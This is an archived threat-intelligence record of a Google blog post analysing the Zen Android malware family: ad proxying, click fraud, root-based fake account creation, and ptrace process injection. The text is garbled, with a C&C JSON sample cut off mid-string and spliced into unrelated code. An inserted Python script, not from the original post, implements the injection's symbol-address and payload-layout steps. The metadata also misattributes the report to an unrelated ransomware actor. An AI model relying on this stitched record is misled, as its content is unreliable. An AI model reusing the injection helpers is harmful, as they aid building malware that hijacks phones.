{
	"id": "a4c5966b-dd36-496c-8a0d-82bdb14a3e5f",
	"created_at": "2026-04-06T01:31:32.0908Z",
	"updated_at": "2026-04-10T13:11:42.55154Z",
	"deleted_at": null,
	"sha1_hash": "3dc9dab3087615a159907d75e0633e9e244959ed",
	"title": "PHA Family Highlights: Zen and its cousins",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 366077,
	"plain_text": "PHA Family Highlights: Zen and its cousins\r\nPublished: 2019-01-11 · Archived: 2026-04-06 00:16:53 UTC\r\nPosted by Lukasz Siewierski, Android Security \u0026 Privacy Team Google Play Protect detects Potentially Harmful\r\nApplications (PHAs) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to\r\nuser data—commonly referred to as \"malware.\" in a variety of ways, such as static analysis, dynamic analysis, and machine\r\nlearning. While our systems are great at automatically detecting and protecting against PHAs, we believe the best security\r\ncomes from the combination of automated scanning and skilled human review. With this blog series we will be sharing our\r\nresearch analysis with the research and broader security community, starting with the PHA family, Zen. Zen uses root\r\npermissions on a device to automatically enable a service that creates fake Google accounts. These accounts are created by\r\nabusing accessibility services. Zen apps gain access to root permissions from a rooting trojan in its infection chain. In this\r\nblog post, we do not differentiate between the rooting component and the component that abuses root: we refer to them\r\ninterchangeably as Zen. We also describe apps that we think are coming from the same author or a group of authors. All of\r\nthe PHAs that are mentioned in this blog post were detected and removed by Google Play Protect.\r\nBackground\r\nUncovering PHAs takes a lot of detective work and unraveling the mystery of how they're possibly connected to other apps\r\ntakes even more. PHA authors usually try to hide their tracks, so attribution is difficult. Sometimes, we can attribute\r\ndifferent apps to the same author based on a small, unique pieces of evidence that suggest similarity, such as a repetition of\r\nan exceptionally rare code snippet, asset, or a particular string in the debug logs. 
Every once in a while, authors leave behind\r\na trace that allows us to attribute not only similar apps, but also multiple different PHA families to the same group or person.\r\nHowever, the actual timeline of the creation of different variants is unclear. In April 2013, we saw the first sample, which\r\nmade heavy use of dynamic code loading (i.e., fetching executable code from remote sources after the initial app is\r\ninstalled). Dynamic code loading makes it impossible to state what kind of PHA it was. This sample displayed ads from\r\nvarious sources. More recent variants blend rooting capabilities and click fraud. As rooting exploits on Android become less\r\nprevalent and lucrative, PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud. This post\r\ndoesn't follow the chronological evolution of Zen, but instead covers relevant samples from least to most complex.\r\nApps with a custom-made advertisement SDK\r\nThe simplest PHA from the author's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic. By proxying all requests through a custom server, the real source of ads is opaque. This example\r\nshows one possible implementation of this technique.\r\n This\r\napproach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps.\r\nIt may even allow them to sell ad space directly to application developers. The advertisement SDK also collects statistics\r\nabout clicks and impressions to make it easier to track revenue. Selling the ad traffic directly or displaying ads from other\r\nsources in a very large volume can provide direct profit to the app author from the advertisers. We have seen two types of\r\napps that use this custom-made SDK. The first are games of very low quality that mimic the experience of popular mobile\r\ngames. 
While the counterfeit games claim to provide similar functionality to the popular apps, they are simply used to\r\ndisplay ads through a custom advertisement SDK. The second type of apps reveals an evolution in the author's tactics.\r\nInstead of implementing very basic gameplay, the authors pirated and repackaged the original game in their app and bundled\r\nwith it their advertisement SDK. The only noticeable difference is the game has more ads, including ads on the very first\r\nscreen. In all cases, the ads are used to convince users to install other apps from different developer accounts, but written by\r\nthe same group. Those apps use the same techniques to monetize their actions.\r\nClick fraud apps\r\nThe authors' tactics evolved from advertisement spam to real PHA (Click Fraud). Click fraud PHAs simulate user clicks on\r\nads instead of simply displaying ads and waiting for users to click them. This allows the PHA authors to monetize their apps\r\nmore effectively than through regular advertising. This behavior negatively impacts advertisement networks and their clients\r\nhttps://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html\r\nPage 1 of 6\n\nbecause advertising budget is spent without acquiring real customers, and impacts user experience by consuming their data\nplan resources. The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an\nadditional SDK. The command \u0026 control server (C\u0026C server) returns the URL to click along with a very long list of\nadditional parameters in JSON format. After rendering the ad on the screen, the app tries to identify the part of the\nadvertisement website to click. If that part is found, the app loads Javascript snippets from the JSON parameters to click a\nbutton or other HTML element, simulating a real user click. 
Because a user interacting with an ad often leads to a higher chance of the user purchasing something, ad networks often \"pay per click\" to developers who host their ads. Therefore, by simulating fraudulent clicks, these developers are making money without requiring a user to click on an advertisement. This example code shows a JSON reply returned by the C\u0026C server. It has been shortened for brevity.\r\n{\r\n \"data\": [{\r\n \"id\": \"107\",\r\n \"url\": \"\",\r\n \"click_type\": \"2\",\r\n \"keywords_js\": [{\r\n \"keyword\": \"\r\n\r\nif (!title.containsKey(new String(android.util.Base64.decode(\"SG93IHlvdeKAmWxsIHNpZ24gaW4=\".getBytes(), 0)\r\n if (!title.containsKey(\"Create password\")) {\r\n if (!title.containsKey(\"Add phone number\")) {\r\n(The Base64 literal decodes to the screen title How you’ll sign in.)\r\nApart from injecting code to read the CAPTCHA, the app also injects its own code into the system_server process, which requires root privileges. This indicates that the app tries to hide itself from anti-PHA systems that look for a specific app process name, or that cannot scan the memory of the system_server process. The app also creates hooks to prevent the phone from rebooting or going to sleep, and to stop the user from pressing hardware buttons during the account creation process. These hooks are created using root access and custom native code called Lmt_INJECT, although the algorithm it implements is well known. First, the app has to turn off SELinux protection. Then the app finds the process id of the process it wants to inject code into. This is done using a series of syscalls as outlined below. The \"source process\" refers to the Zen trojan running as root, while the \"target process\" refers to the process into which the code is injected, and [pid] refers to the target process pid value.\r\n1. The source process checks the mapping between a process id and a process name. This is done by reading the /proc/[pid]/cmdline file. This very first step fails in Android 7.0 and higher, even with root permission: the /proc filesystem is now mounted with the hidepid=2 parameter, which means that a process cannot access another process's /proc/[pid] directory.\r\n2. The ptrace syscall is called with PTRACE_ATTACH. This allows the source process to trace the target.\r\n3. The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address.\r\n4. The source process reads /proc/[pid]/maps to find where libc is located in the target process memory. By adding the previously calculated offset, it gets the address of the mmap function in the target process memory.\r\n5. The source process determines the location of the dlopen, dlsym, and dlclose functions in the target process. It uses the same technique as it used to determine the offset to the mmap function.\r\n6. The source process writes the native shellcode into the memory region allocated by mmap. Additionally, it writes the addresses of dlopen, dlsym, and dlclose into the same region, so that they can be used by the shellcode. The shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it.\r\n7. The source process changes the registers in the target process so that the PC register points directly to the shellcode. This is done using the ptrace syscall.\r\n[Diagram in the original post illustrating the whole injection process.]\r\nSummary\r\nPHA authors go to great lengths to come up with increasingly clever ways to monetize their apps. Zen family PHA authors exhibit a wide range of techniques, from simply inserting an advertising SDK to a sophisticated trojan. The app that resulted in the largest number of affected users was the click fraud version, which was installed over 170,000 times at its peak in February 2018.\r\n
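Steps 3 to 6 above come down to address arithmetic over /proc/[pid]/maps, and step 1 depends on how /proc is mounted. The following Python is an added example, not code from the original post or from the Zen sample: it resolves a libc symbol in a target process from its offset in the source process, parses the hidepid mount option that defeats step 1 on Android 7.0 and higher, and lays out the step 6 region. The maps excerpts, the addresses, the mount line and the pointer-then-path region layout are all constructed assumptions; the ptrace attach, memory write and register manipulation of steps 2, 6 and 7 are deliberately not implemented here.

```python
import ctypes
import ctypes.util
import struct

# Constructed /proc/[pid]/maps excerpts for the source (injector) process and
# the target process. Invented for this example, not captured from a device.
SOURCE_MAPS = '''
7f3a1c000000-7f3a1c025000 r--p 00000000 fd:01 1234   /system/lib64/libc.so
7f3a1c025000-7f3a1c1a0000 r-xp 00025000 fd:01 1234   /system/lib64/libc.so
7f3a1c1a0000-7f3a1c1f0000 rw-p 001a0000 fd:01 1234   /system/lib64/libc.so
7f3a1d000000-7f3a1d008000 r-xp 00000000 fd:01 1235   /system/lib64/libdl.so
7f3a1e000000-7f3a1e021000 rw-p 00000000 00:00 0
'''
TARGET_MAPS = '''
7e9900000000-7e9900025000 r--p 00000000 fd:01 1234   /system/lib64/libc.so
7e9900025000-7e99001a0000 r-xp 00025000 fd:01 1234   /system/lib64/libc.so
7e9a00000000-7e9a00008000 r-xp 00000000 fd:01 1235   /system/lib64/libdl.so
'''
# Constructed /proc/mounts line in the form Android 7.0+ uses for /proc.
ANDROID_MOUNTS = 'proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=2 0 0'


def parse_maps(text):
    # Yield (start, end, perms, path) per maps line; anonymous maps have no path.
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        start, end = (int(x, 16) for x in parts[0].split('-'))
        path = parts[5] if len(parts) > 5 else ''
        yield start, end, parts[1], path


def module_base(maps_text, name):
    # Lowest start address of a library whose file name begins with name
    # (libc.so also matches libc.so.6 on glibc hosts).  Steps 3 and 4.
    starts = [s for s, _e, _p, path in parse_maps(maps_text)
              if path.rsplit('/', 1)[-1].startswith(name)]
    if not starts:
        raise LookupError(name + ' is not mapped')
    return min(starts)


def remote_symbol(local_sym, local_maps, remote_maps, name):
    # Steps 3 to 5: the symbol sits at the same offset from the library base in
    # both processes; only the load base differs.
    offset = local_sym - module_base(local_maps, name)
    return module_base(remote_maps, name) + offset


def proc_hidepid(mounts_text):
    # hidepid level of /proc from /proc/mounts text, 0 when unset.  Android 7.0+
    # mounts /proc with hidepid=2, which is why step 1 fails there.
    named = {'off': 0, 'noaccess': 1, 'invisible': 2, 'ptraceable': 4}
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == '/proc':
            for opt in fields[3].split(','):
                if opt.startswith('hidepid='):
                    value = opt[len('hidepid='):]
                    return int(value) if value.isdigit() else named.get(value, 0)
    return 0


def payload_region(dlopen_addr, dlsym_addr, dlclose_addr, so_path):
    # Step 6 region contents.  Layout assumed for this example (the page does
    # not give the real Lmt_INJECT layout): three little-endian 64-bit pointers
    # for the shellcode to call, followed by the NUL-terminated path to dlopen.
    pointers = struct.pack('<QQQ', dlopen_addr, dlsym_addr, dlclose_addr)
    return pointers + so_path.encode() + bytes(1)


def local_libc_offset(symbol):
    # Step 3 against the live process: distance of a libc symbol from the libc
    # base, taken from our own /proc/self/maps (Linux only).
    libc = ctypes.CDLL(ctypes.util.find_library('c'))
    addr = ctypes.cast(getattr(libc, symbol), ctypes.c_void_p).value
    with open('/proc/self/maps') as fh:
        return addr - module_base(fh.read(), 'libc.so')


if __name__ == '__main__':
    target_mmap = remote_symbol(0x7f3a1c0a1230, SOURCE_MAPS, TARGET_MAPS, 'libc.so')
    print('mmap in target process: ' + hex(target_mmap))
    print('hidepid level on the constructed Android mount: ' + str(proc_hidepid(ANDROID_MOUNTS)))
    try:
        print('live mmap offset from libc base: ' + hex(local_libc_offset('mmap')))
    except Exception as exc:
        print('live lookup unavailable on this host: ' + repr(exc))
```

Run as a script on a Linux host, the last line reports the real mmap offset computed from the interpreter's own libc, which is the quantity Zen computes in step 3; on other hosts that lookup is reported as unavailable and the constructed maps still exercise the arithmetic.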
The most affected countries were India, Brazil, and Indonesia. In most cases, these click fraud apps were uninstalled by the users, probably due to the low quality of the apps. If Google Play Protect detects one of these apps, it shows a warning to the user. We are constantly on the lookout for new threats and we are expanding our protections. Every device with Google Play includes Google Play Protect, and all apps on Google Play are automatically and periodically scanned by our solutions. You can check the status of Google Play Protect on your device:\r\n1. Open your Android device's Google Play Store app.\r\n2. Tap Menu\u003ePlay Protect.\r\n3. Look for information about the status of your device.\r\nHashes of samples\r\nType | Package name | SHA256 digest (truncated as archived)\r\nCustom ads | com.targetshoot.zombieapocalypse.sniper.zombieshootinggame | 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d4403\r\nClick fraud | com.counterterrorist.cs.elite.combat.shootinggame | 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5\r\nRooting trojan | com.android.world.news | bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327\r\nZen trojan | com.lmt.register | eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a09\r\nSource: https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html"
	],
	"report_names": [
		"pha-family-highlights-zen-and-its.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439092,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3dc9dab3087615a159907d75e0633e9e244959ed.pdf",
		"text": "https://archive.orkl.eu/3dc9dab3087615a159907d75e0633e9e244959ed.txt",
		"img": "https://archive.orkl.eu/3dc9dab3087615a159907d75e0633e9e244959ed.jpg"
	}
}